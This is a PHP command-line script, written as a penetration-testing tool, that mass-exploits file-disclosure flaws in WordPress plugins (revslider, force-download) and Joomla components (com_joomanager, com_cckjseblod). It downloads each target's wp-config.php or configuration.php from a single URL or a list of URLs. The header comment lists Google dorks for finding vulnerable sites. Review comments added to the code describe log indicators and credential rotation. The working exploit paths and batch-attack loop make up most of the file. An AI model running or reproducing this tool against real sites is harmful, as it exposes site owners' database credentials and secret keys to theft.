- #!/usr/bin/php
- <?php
- /*
- Autor: Angel Cantu
- Mail: angel.cantu@sie-group.net
- DISCLAIMER
- This script is for penetration testing only; do not use this code to alter or attack websites
- DORKS
- inurl:'index.php?option=com_joomanager
- inurl:option=com_cckjseblod
- inurl:/wp-content/plugins/revslider/
- revslider.php 'index of
- inurl:force-download.php?file=wp-content/uploads
- inurl:wp-content/uploads inurl:force-download.php?file=
- */
/**
 * Classify a command-line argument as a local file or as a URL.
 *
 * The file test runs first, so a name that exists under the current working
 * directory is always treated as a file, even if it also parses as a URL.
 *
 * @param string $a File name relative to getcwd(), or a URL.
 * @return int 1 when getcwd()."/".$a exists, 2 when parse_url() yields both a
 *             scheme and a host, 0 otherwise.
 */
function fileOrUrl($a)
{
    if (file_exists(getcwd() . "/" . $a)) {
        return 1; // file with urls
    }

    // Only "scheme" and "host" are inspected; nothing restricts the scheme
    // to http/https at this point.
    $parts = parse_url($a);
    if ($parts["scheme"] && $parts["host"]) {
        return 2;
    }

    return 0;
}
/**
 * Return the host part of the first http(s) URL found in a string.
 *
 * The host is whatever run of letters, digits, dots and hyphens follows
 * "http://" or "https://"; a port, path or query string is not included.
 * attackSend() uses this value as the prefix of its log file name, so the
 * character class is also what keeps slashes out of that file name.
 *
 * @param string $a Text containing a URL.
 * @return string Host name of the first match.
 */
function geturlname($a)
{
    $matches = array();
    preg_match_all('/http(s)?\:\/\/([a-zA-Z0-9.\-]{1,})/', $a, $matches);

    // Group 2 holds the host of every match; only the first one is used.
    $hosts = $matches[2];
    return $hosts[0];
}
/**
 * Reduce a URL to "scheme://host".
 *
 * Only the first http(s) URL in the input is considered. Port, path, query
 * string and fragment are dropped, because the host pattern accepts only
 * letters, digits, dots and hyphens.
 *
 * @param string $a Text containing a URL.
 * @return string "http://host" or "https://host" for the first match.
 */
function getUrl($a)
{
    $matches = array();
    preg_match_all('/http(s)?\:\/\/([a-zA-Z0-9.\-]{1,})/', $a, $matches);

    // Group 1 is "s" for https and empty for plain http.
    $scheme = $matches[1][0] ? 'https' : 'http';

    return $scheme . '://' . $matches[2][0];
}
/**
 * Return the fixed table of request paths used for one CMS family.
 *
 * Every entry's "exploit" value is a path plus query string that asks a
 * component's download or image handler to return the site's configuration
 * file (configuration.php for Joomla, wp-config.php for WordPress);
 * presumably these rely on file-disclosure flaws in the named components.
 *
 * Defensive use: the four strings below are stable indicators to search for
 * in web access logs or to match in WAF rules. If a server answered one of
 * them with a non-empty body, treat the database credentials and secret keys
 * in that configuration file as exposed: rotate them, and update or remove
 * the affected component.
 *
 * @param string $a "w" selects the WordPress table; any other value selects
 *                  the Joomla table.
 * @return array Table with a "name" label followed by entries 0 and 1, each
 *               an array with "name" and "exploit" keys.
 */
function attackLibrary($a)
{
    if (strcmp($a, "w") === 0) {
        return [
            "name" => "Wordpress",
            0 => [
                "name" => "wp_revslider",
                "exploit" => "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php",
            ],
            1 => [
                "name" => "wp_forcedownload",
                "exploit" => "/force-download.php?file=wp-config.php",
            ],
        ];
    }

    return [
        "name" => "Joomla",
        0 => [
            "name" => "joom_manager",
            "exploit" => "/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php",
        ],
        1 => [
            "name" => "joom_download",
            "exploit" => "/index.php?option=com_cckjseblod&task=download&file=configuration.php",
        ],
    ];
}
# attackSend(): for each entry returned by attackLibrary($mode), request
# $target followed by the entry's "exploit" path and save the response body to
# <cwd>/<host>_<key>.log, then print a result based only on that file's size.
#   $mode   - attack type, passed unchanged to attackLibrary()
#   $target - base URL that the request paths are appended to
# Returns nothing.
# NOTE(review): from the server side each iteration is a single HTTP GET whose
# path and query string are the fixed strings in attackLibrary(). The request
# goes through PHP's stream wrapper, so it presumably carries no browser-like
# User-Agent unless php.ini sets one; confirm before relying on that for detection.
- function attackSend($mode, $target)
- {
- $path= getcwd()."/";
- $a= attackLibrary($mode);
- echo "\n** ". $a["name"]. " Attacking..\n";
- foreach( $a as $key=>$val )
- {
- if( strcmp($key, "name") ) # skip the "name" label, process only the numbered entries
- {
- echo "\n[". $val["name"]. "] Starting attack \"". $val["name"]. "\"..";
- # $cmd= "/usr/bin/curl \"".$target.$val["exploit"]."\" -O ".$path.$target."_".$key.".log";
- # system($cmd); # explot
- $buf= @file_get_contents($target.$val["exploit"]); # '@' suppresses the warning when the fetch fails
- $fp= fopen($path.geturlname($target)."_".$key.".log", "w"); # log name is built from the host part of $target
- fwrite($fp, $buf);
- fclose($fp);
# The verdict depends only on whether the log file is empty: the response
# body is never inspected, so any non-empty reply (an error page included)
# is reported as success.
- if( !filesize($path.geturlname($target).'_'.$key.'.log') )
- echo "\n[ERROR] The config is protected..";
- else
- echo "\n[DONE] The configuration is Hacked xD";
- unset($cmd, $fp, $buf); # $cmd is assigned only in the commented-out curl variant above
- }
- }
- return;
- }
/**
 * Drop the last byte of a string.
 *
 * The main script applies this to lines read with fgets(), where the last
 * byte is normally the line feed. The byte is removed unconditionally, so a
 * final line without a trailing newline loses its last character, and a line
 * ending in "\r\n" keeps the "\r".
 *
 * @param string $data Line as read from the URL list.
 * @return string $data without its final byte.
 */
function cleanjump( $data )
{
    $keep = strlen($data) - 1;
    return substr($data, 0, $keep);
}
# Command-line entry point. Expects exactly three arguments after the script
# name: "-a", the attack type ("w" or "j"), and either a URL or the name of a
# file in the working directory that lists one URL per line.
# NOTE(review): in file mode every listed URL is passed to attackSend() in a
# tight loop with no delay, and each call makes two requests (one per table
# entry), so in server logs a run appears as paired requests for the fixed
# paths from attackLibrary().
- if( $argc!=4 )
- echo "\n[ERROR] Need argument, try: -a w URL";
- else
- {
- if( !($op=fileOrUrl($argv[3])) ) # 0 = neither an existing file nor a URL
- echo "\n[ERROR] The argument isn't a file neither URL..";
- else
- {
- echo "\n[Done] You provide a ". ($op==1 ? "File with URLs":"URL Web");
- if( strcmp($argv[1], "-a") ) # not set attack type
- echo "\n[ERROR] You don't set attack type, use: \"-a w\" (wordpress) or \"-a j\" (joomla)";
- else if( strcmp($argv[2], "w") && strcmp($argv[2], "j") )
- echo "\n[ERROR] This script only use ttacks with: \"w\" (wordpress) or \"j\" (joomla)";
- else # done
- {
- if( $op==2 ) # url
- {
- $target= geturl($argv[3]); # cleaning: keeps only scheme://host
- $path= getcwd(). "/";
- echo "\n[URL] Target detected: ". $target;
- echo "\n[Path] Working on: ". $path;
- echo "\n\n";
- attackSend($argv[2], $target);
- }
- else # file
- {
# $path is assigned only in the URL branch above, so it is unset here and the
# file name is opened exactly as given on the command line.
- $fp= fopen($path.$argv[3], "r");
- $urls= array();
- while( ($buf=fgets($fp, (5*1024)))!==FALSE ) # at most 5 KiB is read per line
- $urls[]= cleanjump($buf); # strips the last byte of every line read
- echo "\n[FILE] Detected: ". count($urls). " targets..";
- echo "\n[LIST] Targets List:\n";
- foreach( $urls as $key=>$val ) echo "\n". $val;
# Unlike the URL branch, list entries are not passed through geturl() first;
# each line is handed to attackSend() as read. $fp is never closed explicitly.
- foreach( $urls as $key=>$val ) attackSend($argv[2], $val);
- unset($urls);
- }
- }
- }
- }
- echo "\n\n";
- exit;
- ?>